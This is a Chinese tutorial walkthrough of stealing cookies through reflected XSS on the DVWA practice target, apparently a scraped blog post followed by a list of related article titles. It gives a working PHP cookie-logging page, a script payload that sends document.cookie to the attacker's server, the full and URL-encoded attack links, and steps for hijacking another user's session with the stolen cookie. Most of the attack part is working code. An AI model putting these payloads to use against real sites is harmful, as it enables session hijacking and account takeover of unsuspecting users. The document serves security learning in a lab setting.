流程:

第一步:搭建用于接收cookie的web站点。
第二步:构建恶意链接发送给用户。
第三步:用户点击恶意链接,目标网站返回带有恶意代码的web页面。
第四步:浏览器解析web页面,执行恶意代码,跳转到搭建的web站点。
第五步:从搭建的web站点中获取用户cookie。

准备

靶场:dvwa
工具:burpsuite,kali虚拟机

第一步

***搭建我们的web站点,用来接收用户cookie。***
这里我用kali来模拟,打开我的kali虚拟机,开启apache服务,进入/var/www/html文件,写一个用来接收cookie的网页,代码如下:
<?php$a=$_GET["cookie"];$file=fopen("gtck.html","a") or exit("</br>未找到文件!");fwrite($file,$a."</br>");fclose($file);
?>
很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie。

之后还有很重要的一件事,我们要给这两个文件改一下权限,不然会导致写入不成功,用户传来的cookie我们无法保存,
首先为我们要查看一下运行apache的用户名,然后更改两个文件的权限。
ps -axu | grep apache #查看运行apache的用户名
chown www-data:www-data xssgc.php gtck.html # 更改文件权限

浏览器访问http://192.168.0.109/xssgc.php?cookie=1,看看传入的值有没有保存在gtck.html里。


可以看到写入成功了,第一步完成。

第二步:

***构建恶意链接发送给用户。***
我们登录dvwa,将难度调到low,然后选择反射型xss:

我们知道这里存在反射型xss漏洞,所以我们直接构建恶意代码:
<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到
我们网页的作用,document.cookie起到获取用户cookie的作用,那么拼接上dvwa的url就是:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
但是url里直接有代码就很明显,而且有时还会出错,所以我们要对payload进行url编码。
打开burp,选择decoder选项,输入我们的payload,选择url编码。
(当然也可以在一些在线编码网站上进行编码)

将编码后的paylod复制下来,然后拼接上url:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%31%30%39%2f%78%73%73%67%63%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65a%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
这就是最后完整的url,我们还可以对其伪造一下,列如短链接啥的,不过只是为了演示这儿就不弄了。

第三步:

***将恶意链接发送给用户,用户点击。***
我们在物理机上用另一个账号登录dvwa,登录昵称为1337。

然后点击我们的恶意链接,模拟用户点击。

我们发现页面跳转到了我们准备的web网页,去kali看一下有没有保存到cookie:

保存成功!!

第四步:通过cookie更改账户

我们回到admin这个账户上,通过f12更改cookie,将cookie改为我们刚获取到的用户的cookie。

然后刷新一下。

可以看到我们的用户变为了1337。

反射型xss钓鱼盗取用户cookie相关推荐

  1. xss漏洞-DVWA跨站攻击盗取用户cookie值

    程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style ...

  2. 2021-09-01 网安实验-XSS-存储型XSS获取用户cookie

    一:存储型XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参 ...

  3. 反射型xss(跨站脚本攻击)

    反射型xss(跨站脚本攻击) 通常人们会把跨站脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把跨站脚本攻击缩写为xss. xss原 ...

  4. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  5. php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie

    目录结构 一.测试环境 二.测试目标 三.原理描述 四.操作步骤 1.在服务器上搭建并启用hacker测试网站 2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹 3.在xss文件夹下创建攻击 ...

  6. 三个臭皮匠浅谈xss获取用户cookie的安全漏洞

    利用别人的cookie,他们可以冒充真实的用户,在颁发cookie的那个网站中为所欲为,个人隐私在他们面前根本不存在. 接下来这篇文章以3个兄弟之间的对话进行讲解. 运气好的话连别人的用户名和密码都能 ...

  7. 最新钓鱼网站假扮Office 365 信箱 恐会盗取用户密码

    网站 Bleeping Computer 先前报导,近日网络出现新钓鱼邮件,不法分子发送假扮 Office 365 无法送出邮件的提示信,尝试盗取用户的密码.最先由 ISC Handler 的 Xav ...

  8. 【Web安全】XSS简介与XSS测试平台截取用户COOKIE的探索

    文章目录 1 XSS简介 2 XSS分类 3 XSS原理演示 4 XSS测试平台使用 4.1 指引文档 4.2 勾选默认模块测试成功的返回值 1 XSS简介 百度百科的解释: XSS又叫CSS (Cr ...

  9. 反射型XSS漏洞详解

    反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...

最新文章

  1. 【小妙招】【旧版】欢庆网自动搜索请柬console方法
  2. python装饰器函数-python3 函数:函数装饰器
  3. ngrx心得体会总结
  4. 现代女性都有哪些烦恼?
  5. ubuntu vim php配置文件在哪,ubuntu vim的配置文件在哪
  6. 提高虚拟机运行速度方法
  7. 协议圣经 五 rtsp client
  8. matlab简单分析短时傅里叶变换STFT
  9. 我最喜欢的ORM工具—Simple Data(转)
  10. paip. C#.NET循环获取不同随机数的方法根据时间
  11. 搭建samba映射网络驱动器
  12. 【统信UOS】扫描仪设备管理驱动安装
  13. Nessus插件离线下载
  14. HWP转Word说明
  15. ffmpeg+mencoder环境搭建和视频处理总结(4m/1/99)
  16. 请教求助,打开U盘显示,你当前无权访问该文件夹。
  17. numpy数组中元素单个选取或部分选取
  18. 数字化时代的新形式下,如何提升客户满意度,实现客户成功?
  19. 为什么很多计算机专业大学生毕业后还会参加培训?
  20. 苹果手机桌面怎么显示便签内容?

热门文章

  1. TopDown Engine中文文档 (十六输入)
  2. 从键盘上输入一个地区名,根据地区名判断属于哪个城市
  3. stm32f103r6最小系统原理图_stm32最小系统原理及结构组成
  4. 程序猿初体验之“大一女生“【心路之旅】
  5. 【光学】Matlab实现杨氏双缝干涉仿真
  6. 【开源】基于飞桨PaddleClas构建个人PC智慧相册
  7. 【数据结构与算法基础】树与二叉树的互化
  8. IDEA单个文件夹自动折叠的问题
  9. 使用方式一 实现电影院买票 并且存在问题
  10. 租一个5000g的云服务器,空间1500G/流量15000G,这样到底有多大?